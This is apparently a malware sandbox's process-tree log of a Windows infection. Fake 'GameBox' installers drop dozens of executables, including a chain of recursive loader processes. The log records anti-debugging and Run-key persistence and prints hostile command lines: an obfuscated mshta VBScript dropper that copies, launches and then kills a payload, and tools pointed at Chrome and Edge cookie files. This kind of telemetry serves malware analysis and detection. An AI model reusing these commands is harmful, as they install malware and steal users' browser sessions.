C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fi0kulzt.ua1\ufgaa.exe & exit9⤵PID:5652
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1lcdrqeg.biw\anyname.exe & exit9⤵PID:7032
-
C:\Users\Admin\AppData\Local\Temp\1lcdrqeg.biw\anyname.exeC:\Users\Admin\AppData\Local\Temp\1lcdrqeg.biw\anyname.exe10⤵PID:6788
-
C:\Users\Admin\AppData\Local\Temp\1lcdrqeg.biw\anyname.exe"C:\Users\Admin\AppData\Local\Temp\1lcdrqeg.biw\anyname.exe" -q11⤵
- Suspicious use of SendNotifyMessage
PID:6516
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mymhkhz1.11i\gcleaner.exe /mixfive & exit9⤵PID:7892
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵PID:6740
-
-
C:\Users\Admin\AppData\Local\Temp\mymhkhz1.11i\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\mymhkhz1.11i\gcleaner.exe /mixfive10⤵PID:2560
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2560 -s 29211⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5216
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\e22kotax.rvg\autosubplayer.exe /S & exit9⤵
- Suspicious use of SetWindowsHookEx
PID:8032
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"5⤵PID:796
-
C:\Users\Admin\AppData\Roaming\3023429.exe"C:\Users\Admin\AppData\Roaming\3023429.exe"6⤵
- Executes dropped EXE
PID:1188 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1188 -s 23767⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6128
-
-
-
C:\Users\Admin\AppData\Roaming\1497320.exe"C:\Users\Admin\AppData\Roaming\1497320.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: SetClipboardViewer
PID:2680
-
-
C:\Users\Admin\AppData\Roaming\5013196.exe"C:\Users\Admin\AppData\Roaming\5013196.exe"6⤵
- Executes dropped EXE
PID:2208
-
-
C:\Users\Admin\AppData\Roaming\8694641.exe"C:\Users\Admin\AppData\Roaming\8694641.exe"6⤵
- Executes dropped EXE
PID:3672
-
-
C:\Users\Admin\AppData\Roaming\2562092.exe"C:\Users\Admin\AppData\Roaming\2562092.exe"6⤵
- Executes dropped EXE
PID:1180 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1180 -s 24327⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:7408
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"5⤵PID:1188
-
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q6⤵
- Executes dropped EXE
PID:5908 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5908 -s 6687⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4840
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"5⤵
- Executes dropped EXE
PID:1028 -
C:\Users\Admin\AppData\Local\Temp\tmp24E_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp24E_tmp.exe"6⤵PID:6728
-
C:\Windows\SysWOW64\dllhost.exe"C:\Windows\System32\dllhost.exe"7⤵PID:6740
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks7⤵PID:3268
-
C:\Windows\SysWOW64\cmd.execmd8⤵PID:3488
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks9⤵PID:7656
-
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comEsplorarne.exe.com i9⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:7332 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i10⤵
- Suspicious use of SendNotifyMessage
PID:6620 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i11⤵
- Suspicious use of SendNotifyMessage
PID:7920 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i12⤵
- Suspicious use of SendNotifyMessage
PID:6664 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i13⤵
- Suspicious use of SendNotifyMessage
PID:3572 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i14⤵
- Suspicious use of SendNotifyMessage
PID:4608 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i15⤵
- Suspicious use of SendNotifyMessage
PID:6216 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i16⤵
- Suspicious use of SendNotifyMessage
PID:7420 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i17⤵
- Suspicious use of SendNotifyMessage
PID:6500 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i18⤵
- Suspicious use of SendNotifyMessage
PID:7548 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i19⤵
- Suspicious use of SendNotifyMessage
PID:3428 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i20⤵PID:6516
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i21⤵
- Suspicious use of SendNotifyMessage
PID:7096 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i22⤵PID:7236
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i23⤵
- Suspicious use of SendNotifyMessage
PID:2640 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i24⤵PID:1728
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i25⤵
- Suspicious use of SendNotifyMessage
PID:7812 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i26⤵
- Suspicious use of SendNotifyMessage
PID:7840 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i27⤵
- Suspicious use of SendNotifyMessage
PID:5168 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i28⤵
- Suspicious use of SendNotifyMessage
PID:1500 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i29⤵
- Suspicious use of SendNotifyMessage
PID:1308 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i30⤵
- Suspicious use of SendNotifyMessage
PID:3432 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i31⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3972 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i32⤵PID:7172
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i33⤵PID:6404
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i34⤵PID:6244
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i35⤵PID:7932
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i36⤵PID:984
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i37⤵PID:5672
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i38⤵PID:5348
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i39⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:7940 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i40⤵PID:2280
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i41⤵PID:7260
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i42⤵PID:2288
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i43⤵PID:5616
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i44⤵PID:5872
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i45⤵PID:6252
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i46⤵PID:7684
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i47⤵PID:8052
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i48⤵PID:1928
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i49⤵PID:5980
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i50⤵PID:7732
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i51⤵PID:6552
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i52⤵PID:720
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i53⤵PID:1992
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i54⤵PID:7736
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i55⤵PID:3080
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i56⤵PID:7868
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i57⤵PID:3264
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i58⤵PID:2772
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i59⤵PID:984
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i60⤵PID:420
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i61⤵PID:6640
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\PING.EXEping YJTUIPJF -n 309⤵
- Runs ping.exe
PID:7620
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"5⤵
- Executes dropped EXE
PID:5264 -
C:\Users\Admin\Documents\N4XjdNcFe_Z0BUJ85LvJaqql.exe"C:\Users\Admin\Documents\N4XjdNcFe_Z0BUJ85LvJaqql.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4220
-
-
C:\Users\Admin\Documents\EP5CRngJUmr_7aIhS0F_Q1Zn.exe"C:\Users\Admin\Documents\EP5CRngJUmr_7aIhS0F_Q1Zn.exe"6⤵
- Executes dropped EXE
PID:5936 -
C:\Users\Admin\AppData\Roaming\2844412.exe"C:\Users\Admin\AppData\Roaming\2844412.exe"7⤵PID:5896
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5896 -s 23408⤵
- Program crash
PID:4884
-
-
-
C:\Users\Admin\AppData\Roaming\3630254.exe"C:\Users\Admin\AppData\Roaming\3630254.exe"7⤵PID:6724
-
-
C:\Users\Admin\AppData\Roaming\6779625.exe"C:\Users\Admin\AppData\Roaming\6779625.exe"7⤵
- Suspicious behavior: SetClipboardViewer
PID:4584
-
-
C:\Users\Admin\AppData\Roaming\1431665.exe"C:\Users\Admin\AppData\Roaming\1431665.exe"7⤵PID:3152
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 24328⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:7648
-
-
-
-
C:\Users\Admin\Documents\NS5edTM1Q33TbDz_m9mXJEFf.exe"C:\Users\Admin\Documents\NS5edTM1Q33TbDz_m9mXJEFf.exe"6⤵PID:6680
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6680 -s 3207⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6008
-
-
-
C:\Users\Admin\Documents\7QNnem616FA5puwl_J1oqz9W.exe"C:\Users\Admin\Documents\7QNnem616FA5puwl_J1oqz9W.exe"6⤵PID:6624
-
-
C:\Users\Admin\Documents\2eJaZzpC2a11K763lgm4Ocwc.exe"C:\Users\Admin\Documents\2eJaZzpC2a11K763lgm4Ocwc.exe"6⤵PID:6616
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6616 -s 2927⤵
- Program crash
PID:5236
-
-
-
C:\Users\Admin\Documents\kNDXtwCeVUVSZao6QWMcE0Or.exe"C:\Users\Admin\Documents\kNDXtwCeVUVSZao6QWMcE0Or.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6608
-
-
C:\Users\Admin\Documents\yJ7vC3QI_kJL79nYmpHBKAVA.exe"C:\Users\Admin\Documents\yJ7vC3QI_kJL79nYmpHBKAVA.exe"6⤵
- Suspicious use of SetThreadContext
PID:6588 -
C:\Users\Admin\Documents\yJ7vC3QI_kJL79nYmpHBKAVA.exeC:\Users\Admin\Documents\yJ7vC3QI_kJL79nYmpHBKAVA.exe7⤵PID:3396
-
-
C:\Users\Admin\Documents\yJ7vC3QI_kJL79nYmpHBKAVA.exeC:\Users\Admin\Documents\yJ7vC3QI_kJL79nYmpHBKAVA.exe7⤵PID:3372
-
-
-
C:\Users\Admin\Documents\0obLAuwqU13NotahfdOa_8R4.exe"C:\Users\Admin\Documents\0obLAuwqU13NotahfdOa_8R4.exe"6⤵
- Suspicious use of SetThreadContext
PID:6580 -
C:\Users\Admin\Documents\0obLAuwqU13NotahfdOa_8R4.exe"C:\Users\Admin\Documents\0obLAuwqU13NotahfdOa_8R4.exe"7⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4000
-
-
-
C:\Users\Admin\Documents\YnSQg72BP6wcHVfgo4mtVnKA.exe"C:\Users\Admin\Documents\YnSQg72BP6wcHVfgo4mtVnKA.exe"6⤵PID:6452
-
-
C:\Users\Admin\Documents\6v6eI4fLaSrHiBQObjIoiQOe.exe"C:\Users\Admin\Documents\6v6eI4fLaSrHiBQObjIoiQOe.exe"6⤵PID:6444
-
-
C:\Users\Admin\Documents\hPC35bal1gKPROvGNCWy9gzq.exe"C:\Users\Admin\Documents\hPC35bal1gKPROvGNCWy9gzq.exe"6⤵PID:6436
-
-
C:\Users\Admin\Documents\jlVU3myZIjIDrDIdP_2YdjLm.exe"C:\Users\Admin\Documents\jlVU3myZIjIDrDIdP_2YdjLm.exe"6⤵PID:6428
-
-
C:\Users\Admin\Documents\nffwmxmZJAiHIl7y8pU8daOL.exe"C:\Users\Admin\Documents\nffwmxmZJAiHIl7y8pU8daOL.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6420
-
-
C:\Users\Admin\Documents\_TOR_4dwhEKqpGTei55nNpxu.exe"C:\Users\Admin\Documents\_TOR_4dwhEKqpGTei55nNpxu.exe"6⤵PID:6880
-
C:\Users\Admin\Documents\_TOR_4dwhEKqpGTei55nNpxu.exe"C:\Users\Admin\Documents\_TOR_4dwhEKqpGTei55nNpxu.exe" -q7⤵PID:1040
-
-
-
C:\Users\Admin\Documents\Nzi4KGhVoJnhetRcQ5rxSbw3.exe"C:\Users\Admin\Documents\Nzi4KGhVoJnhetRcQ5rxSbw3.exe"6⤵PID:6412
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\Nzi4KGhVoJnhetRcQ5rxSbw3.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\Nzi4KGhVoJnhetRcQ5rxSbw3.exe"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )7⤵PID:4060
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\Nzi4KGhVoJnhetRcQ5rxSbw3.exe" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" =="" for %A In ("C:\Users\Admin\Documents\Nzi4KGhVoJnhetRcQ5rxSbw3.exe" ) do taskkill -f -iM "%~NxA"8⤵PID:6700
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "Nzi4KGhVoJnhetRcQ5rxSbw3.exe"9⤵
- Kills process with taskkill
PID:7800
-
-
-
-
-
C:\Users\Admin\Documents\kIhJNzOC881wVINemCqfn3Lt.exe"C:\Users\Admin\Documents\kIhJNzOC881wVINemCqfn3Lt.exe"6⤵PID:6404
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6404 -s 2807⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6276
-
-
-
C:\Users\Admin\Documents\HErIPJFKbSPxfnG1PfWCoFYr.exe"C:\Users\Admin\Documents\HErIPJFKbSPxfnG1PfWCoFYr.exe"6⤵
- Suspicious use of SetThreadContext
PID:6392 -
C:\Users\Admin\Documents\HErIPJFKbSPxfnG1PfWCoFYr.exeC:\Users\Admin\Documents\HErIPJFKbSPxfnG1PfWCoFYr.exe7⤵PID:3476
-
-
C:\Users\Admin\Documents\HErIPJFKbSPxfnG1PfWCoFYr.exeC:\Users\Admin\Documents\HErIPJFKbSPxfnG1PfWCoFYr.exe7⤵PID:6696
-
-
-
C:\Users\Admin\Documents\0wDpgt8PgMXWHUFAs91rCeA4.exe"C:\Users\Admin\Documents\0wDpgt8PgMXWHUFAs91rCeA4.exe"6⤵PID:7032
-
C:\Users\Admin\AppData\Local\Temp\is-G13MM.tmp\0wDpgt8PgMXWHUFAs91rCeA4.tmp"C:\Users\Admin\AppData\Local\Temp\is-G13MM.tmp\0wDpgt8PgMXWHUFAs91rCeA4.tmp" /SL5="$10496,138429,56832,C:\Users\Admin\Documents\0wDpgt8PgMXWHUFAs91rCeA4.exe"7⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:6328 -
C:\Users\Admin\AppData\Local\Temp\is-D45M5.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-D45M5.tmp\Setup.exe" /Verysilent8⤵PID:572
-
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"9⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
PID:7676 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629314406 /qn CAMPAIGN=""710"" " CAMPAIGN="710"10⤵PID:1824
-
-
-
-
-
-
C:\Users\Admin\Documents\wU8xd95Gn4Nv_GPF8uMfYlig.exe"C:\Users\Admin\Documents\wU8xd95Gn4Nv_GPF8uMfYlig.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6732
-
-
-
-
-
-
C:\Users\Admin\Documents\1rriD4nN4ClDd5aLFMMOfkL_.exe"C:\Users\Admin\Documents\1rriD4nN4ClDd5aLFMMOfkL_.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1404
-
-
C:\Users\Admin\Documents\RjFgmagbQ7RmhF0K1UglrkFw.exe"C:\Users\Admin\Documents\RjFgmagbQ7RmhF0K1UglrkFw.exe"2⤵
- Executes dropped EXE
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:428 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 428 -s 2723⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5592
-
-
-
C:\Users\Admin\Documents\18HdUo1z2PzM80zNKzXol9Tx.exe"C:\Users\Admin\Documents\18HdUo1z2PzM80zNKzXol9Tx.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:1096 -
C:\Program Files (x86)\Company\NewProduct\jooyu.exe"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"3⤵
- Executes dropped EXE
PID:5480 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:5100
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:4952
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6312
-
-
-
C:\Program Files (x86)\Company\NewProduct\customer3.exe"C:\Program Files (x86)\Company\NewProduct\customer3.exe"3⤵
- Executes dropped EXE
PID:5624 -
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6504
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6260
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:2124
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:5652
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:3140
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:704
-
-
